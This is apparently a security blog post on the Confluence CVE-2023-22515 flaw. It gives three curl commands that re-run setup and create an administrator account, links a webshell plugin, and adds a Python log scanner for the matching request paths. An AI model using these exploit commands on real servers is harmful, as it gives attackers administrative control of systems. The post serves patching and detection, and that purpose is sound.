Late last year this vulnerability led to the compromise of several on-premises installs of Atlassian Confluence. CVE-2023-22515 is scarily simple to exploit: certain requests sent to the server were trusted if they contained a particular header. With this it was then possible to re-run part of the initial setup to create an administrator account.
This repository shows that it can be exploited in the following way:
- Step 1 – Update the application to allow setup to run again:
  curl http://<dest>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
- Step 2 – Create the admin user:
  curl -X POST -H "X-Atlassian-Token: no-check" -d "username=&fullName=&email=&password=&confirm=&setup-next-button=Next" http://<dest>/setup/setupadministrator.action
- Step 3 – Complete setup:
  curl -X POST -H "X-Atlassian-Token: no-check" http://<dest>/setup/finishsetup.action
As you can see from the above, the header X-Atlassian-Token with the value no-check is the culprit.
I've made a quick video showing end-to-end exploitation with a webshell; it can be found below:
For bounty hunters and pentesters, this is as easy as it gets to find a critical bug. It is more likely to be found on internal tests, since the initial find led to a wave of compromise, but it's still out there.
For defenders – push your teams to update if you haven't already (affects versions 8.0.0 - 8.5.0). If you really can't update, ensure you have alerting against the following: /server-info.action?bootstrapStatusProvider.applicationConfig, /setup/setupadministrator.action, and /setup/finishsetup.action. I created a lab around this vulnerability for Blue Team Labs Online called WikiLeaked which shows how this looks from the perspective of defenders.
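To make the alerting advice above concrete, here is an added example (my own code, not from the post or from the linked repositories) that scans access-log lines in the common Tomcat/Apache format for the three request patterns named above and flags any source address that hits both the server-info parameter and the setup-administrator endpoint. The log lines are constructed for the example; the exact-path matching and the assumed log format are assumptions you would tune for your own reverse proxy and logging setup.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# The three indicators named in the post. Matching is deliberately narrow:
# /server-info.action alone is a legitimate endpoint, so it is only flagged
# when it carries a bootstrapStatusProvider.applicationConfig parameter.
SETUP_PATHS = {
    "/setup/setupadministrator.action": "setup administrator endpoint",
    "/setup/finishsetup.action": "finish setup endpoint",
}
SERVER_INFO_PATH = "/server-info.action"
SERVER_INFO_PARAM_PREFIX = "bootstrapStatusProvider.applicationConfig"

# Assumed log format (Tomcat/Apache common log style):
#   ip - - [timestamp] "METHOD /target HTTP/1.x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target: str) -> Optional[str]:
    """Return a reason string if the request target matches an indicator."""
    parts = urlsplit(target)
    path = parts.path
    if path in SETUP_PATHS:
        return SETUP_PATHS[path]
    if path == SERVER_INFO_PATH:
        query = parse_qs(parts.query, keep_blank_values=True)
        if any(key.startswith(SERVER_INFO_PARAM_PREFIX) for key in query):
            return "applicationConfig parameter on server-info"
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Scan log lines and return one hit record per matching request."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line; skip rather than miss the rest
        reason = classify(match.group("target"))
        if reason:
            hits.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "method": match.group("method"),
                "target": match.group("target"),
                "status": match.group("status"),
                "reason": reason,
            })
    return hits


def chained_sources(hits: List[Dict[str, str]]) -> List[str]:
    """Sources that both toggled setup state and hit the admin-setup endpoint.

    A single hit may be a scanner probe; the pair is the stronger signal.
    """
    seen: Dict[str, set] = {}
    for hit in hits:
        seen.setdefault(hit["ip"], set()).add(hit["reason"])
    return sorted(
        ip for ip, reasons in seen.items()
        if "applicationConfig parameter on server-info" in reasons
        and "setup administrator endpoint" in reasons
    )


# Constructed sample log: one source walks the full sequence, another only
# fetches the plain server-info page and a dashboard (benign).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jan/2024:10:00:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0
203.0.113.10 - - [10/Jan/2024:10:00:02 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0
203.0.113.10 - - [10/Jan/2024:10:00:03 +0000] "POST /setup/finishsetup.action HTTP/1.1" 302 0
198.51.100.7 - - [10/Jan/2024:10:05:00 +0000] "GET /server-info.action HTTP/1.1" 200 512
198.51.100.7 - - [10/Jan/2024:10:05:05 +0000] "GET /dashboard.action HTTP/1.1" 200 8192
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for hit in found:
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["target"]} -> {hit["reason"]}')
    print("sources completing the chain:", chained_sources(found))
```

Run as-is it reports three hits, all from 203.0.113.10, and names that address as having completed the chain; the plain GET to /server-info.action from the second source is not flagged. If your proxy URL-encodes or rewrites paths, normalise the target before calling classify, and consider matching the path case-insensitively if your deployment accepts that.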
The resources used in the above:
- Curl commands: https://github.com/j3seer/CVE-2023-22515-POC
- Webshell: https://github.com/dubfr33/atlassian-webshell-plugin